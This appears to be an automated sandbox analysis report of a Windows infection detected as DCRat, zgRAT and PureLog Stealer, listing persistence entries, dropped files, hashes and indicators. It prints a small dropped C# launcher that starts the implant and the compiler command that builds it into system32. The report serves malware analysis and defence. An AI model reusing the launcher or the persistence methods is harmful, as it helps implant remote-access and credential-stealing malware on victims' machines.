                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 2536 because it is empty
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 5576 because it is empty
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 5664 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 3336 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 6172 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 6232 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 744 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
15:47:25 | API Interceptor | 37572x Sleep call for process: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe modified
20:47:18 | Task Scheduler | Run new task: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ path: "C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:47:19 | Task Scheduler | Run new task: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi path: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:47:19 | Task Scheduler | Run new task: SearchApp path: "C:\Recovery\SearchApp.exe"
20:47:19 | Task Scheduler | Run new task: SearchAppS path: "C:\Recovery\SearchApp.exe"
20:47:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
20:47:21 | Task Scheduler | Run new task: bridgeportDhcpcommon path: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
20:47:21 | Task Scheduler | Run new task: bridgeportDhcpcommonb path: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
20:47:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:47:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
20:47:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
20:47:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:48:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
20:48:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
20:48:17 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:48:25 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
20:48:42 | Autostart | Run: WinLogon Shell "C:\Recovery\SearchApp.exe"
20:48:50 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:48:58 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
20:49:07 | Autostart | Run: WinLogon Shell "C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.220.198 | F3ePjP272h.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 328579cm.renyash.ru/VmMulti.php
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | Browse | 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
                                                                                                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | KRNL.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
 | 01012025.html | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
 | Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.198.102
 | SET_UP.exe | Get hash | malicious | LummaC | Browse | 104.21.112.1
 | test.doc.bin.doc | Get hash | malicious | Unknown | Browse | 104.21.21.16
 | test.doc.bin.doc | Get hash | malicious | Unknown | Browse | 104.21.21.16
 | web44.mp4.hta | Get hash | malicious | LummaC | Browse | 188.114.96.3
 | test.doc.bin.doc | Get hash | malicious | Unknown | Browse | 104.21.21.16
 | Setup.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
 | qnUFsmyxMm.exe | Get hash | malicious | LummaC | Browse | 172.67.219.133
                                                                                                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\AjJOuhvp.log | eP6sjvTqJa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | 1znAXdPcM5.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | YGk3y6Tdix.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | U1jaLbTw1f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | voed9G7p5s.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | Etqq32Yuw4.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | KzLetzDiM8.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | f3I38kv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | aimware.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | ZZ2sTsJFrt.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (705), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):705
                                                                                                                                Entropy (8bit):5.878716043521497
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:oI6zf8SSts0HdcQitIgCgjyxxAMGrWZKI1OiB2CPzsWw+2RbatLWQWpmyOQa4jn:xs0h9c3tjCMexhGCZ/I02Ksw2AtyQgqu
                                                                                                                                MD5:1C0F9813BA8160CBC8792AB5D19BB220
                                                                                                                                SHA1:C6E2A9432A1FE848F7991862771400D4C2583378
                                                                                                                                SHA-256:E28EC34BAE57BFFD9AA114597DBBDFEBD26B16BE66500AEB1D3A15B87D0A6CF0
                                                                                                                                SHA-512:A439C6B4367A386E52ABB16DAC044E9E33C36279D846D5A76C69C6C58A7A9150117CCF2DAA21A156DA89251860085E2DAB147BA23FFDF27EB5B918E22ABFFA26
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (807), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):807
                                                                                                                                Entropy (8bit):5.888992013397037
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:7s3cMdhk1TkxzgS7fO0fAf9HRqMHI2vi4dbC5zvl7ntQc:kcM/jxUt0fA1HRpbfG55
                                                                                                                                MD5:42E9635B62421308E6840C76535EAAE8
                                                                                                                                SHA1:971BF7B8B55D6BE43A5069F89E9E25E1B9E7945D
                                                                                                                                SHA-256:6728694CB3C8792C6309887FF7DE34C38081BFAC9286142F6B5A3F93BECFF4CF
                                                                                                                                SHA-512:3EACAC6668A55CA01A5C5593F94A7B2BA12B580958B12E9320AEA074CE890E88718871ED78DA37698E4675B7B5F72165207474415767D6B2E4745CF28403F2E6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (530), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):530
                                                                                                                                Entropy (8bit):5.854548221275322
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:gkpRRp1ITrEDje3cr2Lz8tmF71dtVF2nGboRQFylVMRBwkZpyozzkRRICv:gkpR36PEkLz8t0XF2nGQ7MRBrsRRLv
                                                                                                                                MD5:3EBA3DEBEC47742F6858F2684370FCAF
                                                                                                                                SHA1:2CCAF540F2673EC6EF86FE24342140AA4DF0F8D3
                                                                                                                                SHA-256:F6D15B09D1BE8BEF23DAEDC34C502C110CDAC4CFA51DF1AC09F5EE85E17AC7AE
                                                                                                                                SHA-512:B0019D61C32B95E2E21FDF7FAFDB18A702461D59287F7A498714407EE38E5737E18FA57D8023C6395C4BD934DEDA8432915FEEF3AC7DCBFACAF965A5D3573CDB
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SearchApp.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SearchApp.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1396
                                                                                                                                Entropy (8bit):5.350961817021757
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):847
                                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):372
                                                                                                                                Entropy (8bit):4.892148547519402
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29J1niFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLK9
                                                                                                                                MD5:C516B2892E6B9D4B8B7CF14705D6743E
                                                                                                                                SHA1:554385F29DDF9E9E3F5F59153335C4EAEAD9D072
                                                                                                                                SHA-256:AA3B71B0C5D8AEFCD1ECAC812E1058B424F7DFE7A56A3056AE3AD1BFFE495625
                                                                                                                                SHA-512:74A6A0193149A9C9C7F6E161E16A99CA40F5DACCFD6F3C38C4D90F9EA0A29E026E1A1B8F08AC336DA23EC3BD3D8258867B20454806925A94F063E8FEABD19516
                                                                                                                                Malicious:false
                                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\SearchApp.exe"); } catch { } }).Start();. }.}.
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):250
                                                                                                                                Entropy (8bit):5.1256856219400415
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fhX:Hu7L//TRq79cQWf5X
                                                                                                                                MD5:D750BD650EEAAF143F400DE22F53B4C3
                                                                                                                                SHA1:07F4BC1A609BA496002FEB2E20C8A8306838A385
                                                                                                                                SHA-256:CDE84FF30BB7ADCA909971C0B7BA5050D9D32C92750FD6B6EA78224932E25CEA
                                                                                                                                SHA-512:32B9139E627126B6530C13C082ABE630BCA39447FAE192D9FF02A9F20F7E77C27AE59C3473593558F9F82257BD02AF90FEEA3FB428008B340445CEA5B6ED3457
                                                                                                                                Malicious:true
                                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.0.cs"
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):755
                                                                                                                                Entropy (8bit):5.2555725821957955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:zI/u7L//TRq79cQWf5eKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tWfcKax5DqBVKVrdFAMBJj
                                                                                                                                MD5:FE10E61D09400533E0B2A01945816ADA
                                                                                                                                SHA1:FCE28C32A3F4687928FA57E60F440F5BBF8EFDB8
                                                                                                                                SHA-256:1B34610D33FB6AA8C6069FB0BEE71D585728042E756EFAF279A2CEECEB0362E1
                                                                                                                                SHA-512:73E2C3458310DE5F2509ABCCD7A293BAA65B77AFDF530B8F4FFE706E777AEC6E881E50DE3968FB62AF2C43C42850BBC52802D689F43EAE40D4C83920831C5974
                                                                                                                                Malicious:false
                                                                                                                                Preview:.C:\bridgemssurrogateintonet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49152
                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.323856189774723
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:yU/iUfyT7n:BUn
                                                                                                                                MD5:FDB4FDE518EB6B06439C947C0D83CA8E
                                                                                                                                SHA1:978FAE1416CA531A13E4FDFE6577A596C7AD42BE
                                                                                                                                SHA-256:E1C3D9BC15AA22D5A58F3262D63EB58EF1F82703210DF23BC29046F4CF5EF0B9
                                                                                                                                SHA-512:6E9CAD25A449A71BDAE032DAD33068D5F298CA337498367CEC6FAF415AFF3363A79882418EEE0475ADCB146F22F29F0EC924D4AEA2F0CB883F17DF6FC8F58615
                                                                                                                                Malicious:false
                                                                                                                                Preview:JO7a2hwuzkZGqnhbCuPbjW6YO
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
